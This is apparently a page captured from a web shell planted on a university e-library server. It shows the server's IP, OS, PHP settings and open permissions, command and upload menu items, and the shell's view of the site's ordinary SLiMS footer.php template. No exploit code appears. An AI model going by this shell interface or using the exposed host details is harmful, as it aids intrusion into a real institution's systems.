Server IP : 103.11.96.170 / Your IP : 3.140.184.203 Web Server : Microsoft-IIS/10.0 System : Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64 User : elibrary.unsap.ac.id ( 0) PHP Version : 7.4.19 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : D:/localhost/elibrary/template/default/parts/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php # @Author: Waris Agung Widodo <user> # @Date: 2018-01-23T11:26:05+07:00 # @Email: ido.alit@gmail.com # @Filename: footer.php # @Last modified by: yysofiyan # @Last modified time: 2020-03T10:29:27+07:00 ?> <footer class="py-4 bg-grey-darkest text-grey-lighter"> <div class="container"> <div class="row py-4"> <div class="col-md-4 pt-8 md:pt-0"> <h4 class="fas fa-link mr-2"> Link</i></h4> <li><a target="_blank" rel="archives" href="https://www.elsevier.com/about/open-science/open-access/open-access-journals">EISEVIER</a></li> <li><a target="_blank" rel="archives" href="https://authorservices.wiley.com/open-research/open-access/index.html">WILEY</a></li> <li><a target="_blank" rel="archives" href="https://www.springeropen.com/">SPRINGER</a></li> <li><a target="_blank" rel="archives" href="https://www.scienceopen.com/">SCIENCE OPEN</a></li> <li><a target="_blank" rel="archives" href="https://www.sciencedirect.com/browse/journals-and-books">SCIENCE DIRECT</a></li> <li><a target="_blank" rel="archives" href="https://about.jstor.org/oa-and-free/">JSTOR</a></li> <li><a target="_blank" rel="archives" href="http://www.oalib.com/">OAL OPEN ACCESSS LIBARY</a></li> <li><a target="_blank" rel="archives" href="https://academic.oup.com/journals/pages/open_access">OXFORD ACADEMIC</a></li> <li><a target="_blank" rel="archives" href="https://www.lub.lu.se/en/services-support/publishing-registering/open-access">LAUND UNIVRSITY LIBRARIES</a></li> <li><a target="_blank" rel="archives" href="https://www.karger.com/OpenAccess">KARGER</a></li> </ul> </div> <div class="col-md-4 pt-8 md:pt-0"> <h4 class="fas fa-link mr-2"> Link</i></h4> <li><a target="_blank" rel="archives" href="https://www.omicsonline.org/">OMNICS OPEN ACCES</a></li> <li><a target="_blank" rel="archives" href="https://www.biomedcentral.com/">BMC</a></li> <li><a target="_blank" rel="archives" href="https://www.mdpi.com/about/journals">MDPI</a></li> <li><a target="_blank" rel="archives" href="https://www.cogentoa.com/">COGENT OA</a></li> <li><a target="_blank" rel="archives" href="https://www.omicsonline.org/">OPEN ACCESS</a></li> <li><a target="_blank" rel="archives" href="https://www.erudit.org/en/">BRUDIT</a></li> <li><a target="_blank" rel="archives" href="https://www.highwirepress.com/">HIGHWIRE</a></li> <li><a target="_blank" rel="archives" href="https://www.doaj.org/">DIRECTORY OF OSA</a></li> <li><a target="_blank" rel="archives" href="https://www.tandfonline.com/openaccess">TAYLOR & FRANCIS ONLINE</a></li> <li><a target="_blank" rel="archives" href="https://open.thieme.com/web/19/home">THIEME OPEN</a></li> </ul> </div> <div class="col-md-4 pt-8 md:pt-0"> <h4 class="fas fa-search mr-2"> Search</i></h4> <div class="mb-2">start it by typing one or more keywords for title, author or subject</div> <form action="index.php"> <div class="input-group mb-3"> <input name="keywords" type="text" class="form-control" placeholder="Enter keywords" aria-label="Enter keywords" aria-describedby="button-addon2"> <div class="input-group-append"> <button class="btn btn-primary" type="submit" value="search" name="search" id="button-addon2">Find Collection </button> </div> </div> </form> <hr> <a target="_blank" title="Support Us" class="btn btn-outline-success mb-2" href="https://ejournal.unsap.ac.id/"><i class="fas fa-link mr-2"></i><?= __('EJOURNAL UNSAP'); ?></a> <a target="_blank" title="Contribute" class="btn btn-outline-light mb-2" href="https://digilib.lldikti4.or.id/index.php"><i class="fas fa-link mr-2"></i><?= __('DIGILIB LLDIKTI IV'); ?></a><br> <a href="https://info.flagcounter.com/ldCt"><img src="https://s01.flagcounter.com/mini/ldCt/bg_FFFFFF/txt_000000/border_CCCCCC/flags_0/" alt="Flag Counter" border="0"></a> </div> </div> <hr> <div class="flex font-thin text-sm"> <p class="flex-1">© <?php echo date('Y'); ?> — E-LIBRARY UNIVERSITAS SEBELAS APRIL</p> <div class="flex-1 text-right text-grey">Powered by <code>SLiMS</code></div> </div> </div> </footer> <?php if ($sysconf['chat_system']['enabled'] && $sysconf['chat_system']['opac']) : ?> <div id="show-pchat2" style="position: fixed; bottom: 16px; right: 16px" class="shadow rounded"> <button title="Chat" class="btn btn-primary"><i class="fas fa-comments mr-2"></i><?= __('Chat'); ?></button> </div> <?php endif; ?> <?php // Chat Engine include LIB . "contents/chat.php"; ?> <!-- // Load modal --> <?php include "_modal_topic.php"; ?> <?php include "_modal_advanced.php"; ?> <!-- // load our vue app.js --> <script src="<?php echo assets('js/app.js?v=' . date('Ymd-his')); ?>"></script> <script src="<?php echo assets('js/app_jquery.js?v=' . date('Ymd-his')); ?>"></script> <?php include __DIR__ . "./../assets/js/vegas.js.php"; ?> <?php if ($sysconf['chat_system']['enabled'] && $sysconf['chat_system']['opac']) : ?> <script> $('#show-pchat').click(() => { $('.s-chat').hide() $('#show-pchat2').show() }) $('#show-pchat2').click(() => { $('.s-chat').show(300, () => { $('#show-pchat2').hide() }) }) </script> <?php endif; ?> </body> </html>